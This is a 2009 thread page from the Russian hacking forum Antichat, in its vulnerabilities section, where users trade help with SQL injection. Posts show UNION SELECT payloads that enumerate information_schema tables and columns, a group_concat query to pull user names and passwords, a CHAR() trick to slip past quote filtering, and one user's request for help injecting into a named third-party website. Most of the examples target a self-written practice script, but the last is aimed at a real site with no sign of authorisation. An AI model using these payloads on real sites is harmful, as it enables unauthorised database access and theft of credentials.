ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4931  
Старый 23.01.2009, 15:35
Аватар для R1dex
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

Цитата:
Сообщение от Octave_Parango  
Всем привет!

Вывожу информацию:
group_concat(name,0x3a,pass)
Но вывод информации ограничен, через лимит выводится гораздо больше.
Вопрос:
Как вывести всю информацию, без ограничений?
Если нужно выдернуть всех юзеров, а их очень много - использую прогу, для автоматизации процесса.
К примеру - тот же Сипт.
 
Ответить с цитированием

  #4932  
Старый 23.01.2009, 15:42
Аватар для Octave_Parango
Octave_Parango
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682

Репутация: 30
По умолчанию

Всем, спасибо! получилось!
 
Ответить с цитированием

sql-inj
  #4933  
Старый 23.01.2009, 17:14
Аватар для kevmen
kevmen
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889

Репутация: 60
Отправить сообщение для kevmen с помощью ICQ
По умолчанию sql-inj

здравствуйте

http://localhost/view_cat.php?cat=-1+union+select+1,2,column_name,4,5,6,7,8,9+from+in formation_schema.COLUMNS+where+table_name='user'+l imit+1,2

Не выводит ничего!
Хотя запрос вида

http://localhost/school/view_cat.php?cat=-1+union+select+1,2,table_name,4,5,6,7,8,9+from+inf ormation_schema.tables
работатет и выводиться список всех таблиц,в чем моя ошибка?

мне посоветовали перевести в hex
Тогда такой вопрос?
Зачем ?Если скрипт написал я сам для практики и никакой фильтрации там нет!
 
Ответить с цитированием

  #4934  
Старый 23.01.2009, 17:30
Аватар для BloodyMessage
BloodyMessage
Участник форума
Регистрация: 20.08.2006
Сообщений: 199
Провел на форуме:
1074298

Репутация: 131
Отправить сообщение для BloodyMessage с помощью ICQ
По умолчанию

kevmen, попробуй table_name='user' заменить на TABLE_NAME=CHAR(117,115,101,114)

да и запросы по разному пути
/school/view_cat.php и /view_cat.php

Последний раз редактировалось BloodyMessage; 23.01.2009 в 17:35..
 
Ответить с цитированием

  #4935  
Старый 23.01.2009, 17:34
Аватар для Gemini12
Gemini12
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038

Репутация: 9
Отправить сообщение для Gemini12 с помощью ICQ
По умолчанию

Цитата:
Сообщение от kevmen  
здравствуйте

http://localhost/view_cat.php?cat=-1+union+select+1,2,column_name,4,5,6,7,8,9+from+in formation_schema.COLUMNS+where+table_name='user'+l imit+1,2

Не выводит ничего!
Хотя запрос вида

http://localhost/school/view_cat.php?cat=-1+union+select+1,2,table_name,4,5,6,7,8,9+from+inf ormation_schema.tables
работатет и выводиться список всех таблиц,в чем моя ошибка?

мне посоветовали перевести в hex
Тогда такой вопрос?
Зачем ?Если скрипт написал я сам для практики и никакой фильтрации там нет!
Попробуй 'user' заменить на ('user')
 
Ответить с цитированием

  #4936  
Старый 23.01.2009, 17:35
Аватар для kevmen
kevmen
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889

Репутация: 60
Отправить сообщение для kevmen с помощью ICQ
По умолчанию

BloodyMessage,спасибо огромное)обясни только в чем проблема была?в кодировке? =)
 
Ответить с цитированием

  #4937  
Старый 23.01.2009, 17:37
Аватар для kevmen
kevmen
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889

Репутация: 60
Отправить сообщение для kevmen с помощью ICQ
По умолчанию

Цитата:
Сообщение от Gemini12  
Попробуй 'user' заменить на ('user')
не работает
 
Ответить с цитированием

  #4938  
Старый 23.01.2009, 17:37
Аватар для BloodyMessage
BloodyMessage
Участник форума
Регистрация: 20.08.2006
Сообщений: 199
Провел на форуме:
1074298

Репутация: 131
Отправить сообщение для BloodyMessage с помощью ICQ
По умолчанию

kevmen, видать ковычки фильтрует
 
Ответить с цитированием

  #4939  
Старый 23.01.2009, 17:39
Аватар для kevmen
kevmen
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889

Репутация: 60
Отправить сообщение для kevmen с помощью ICQ
По умолчанию

BloodyMessage,база?
А разве база сама может фильтровать?
Извини,если вопрос глупый
 
Ответить с цитированием

  #4940  
Старый 23.01.2009, 17:45
Аватар для Gemini12
Gemini12
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038

Репутация: 9
Отправить сообщение для Gemini12 с помощью ICQ
По умолчанию

Не могу нащупать скулю
Код:
http://www.hc.kz/index.php?action=showpart&part_id=-1'
Может кто поможет?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ